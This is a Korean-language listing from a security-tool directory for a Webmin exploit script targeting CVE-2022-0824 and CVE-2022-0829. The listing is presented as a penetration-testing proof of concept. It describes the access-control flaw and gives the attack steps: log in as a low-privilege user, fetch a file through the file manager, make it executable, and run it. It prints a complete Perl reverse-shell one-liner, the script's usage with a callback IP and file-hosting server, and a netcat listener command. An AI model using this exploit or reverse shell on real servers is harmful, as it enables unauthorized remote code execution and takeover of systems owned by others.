Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, 파일 관리자 권한 상승 익스플로잇 | Kitploit
도구/GitHubGitHub/gokul-ramesh/webminrce-exploit
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, 파일 관리자 권한 상승 익스플로잇

저장소 보기
23년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - File Manager 권한 익스플로잇

이 PoC를 테스트하기 위한 취약한 애플리케이션은 Docker 이미지로 여기에서 찾을 수 있습니다.
사전 요구 사항:

  • Python3
  • Requests 모듈

설명

취약점

원격 코드 실행으로 이어지는 부적절한 접근 제어 안전한 사용자(비권한 사용자)는 기본적으로 제한되어야 하는 File Manager 모듈에 접근할 수 있습니다.

익스플로잇 페이로드

부적절한 접근 제어 취약점을 이용하여 cgi 파일을 webmin 서버에 업로드합니다.

1단계 (인증)

안전한/낮은 권한의 사용자로 서버에 인증하고 로그인합니다.

2단계 (서버에 파일 다운로드)

취약한 File Manager (/file-manager/http_download.cgi) 모듈을 사용하여 서버에 perl 스크립트를 다운로드합니다.
리버스 셸 접근을 위한 Perl 스크립트:
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

3단계 (권한 수정)

파일(/file-manager/chmod.cgi)에 실행 권한을 추가합니다.

4단계 (명령 실행)

업로드된 파일을 호출하여 그 안에 있는 리버스 셸 스크립트를 실행합니다.

사용 방법 :

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

사용 예시:

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

사용자 이름과 비밀번호는 안전한(비권한) 사용자용입니다. 리버스 셸 연결을 받으려면 스크립트를 실행하기 전에 리스너를 설정하세요.

root@kitploit:~
$ nc -lvp <port>

익스플로잇을 제공해 주신 @faisalfs10x 님께 감사드립니다.

도구 다운로드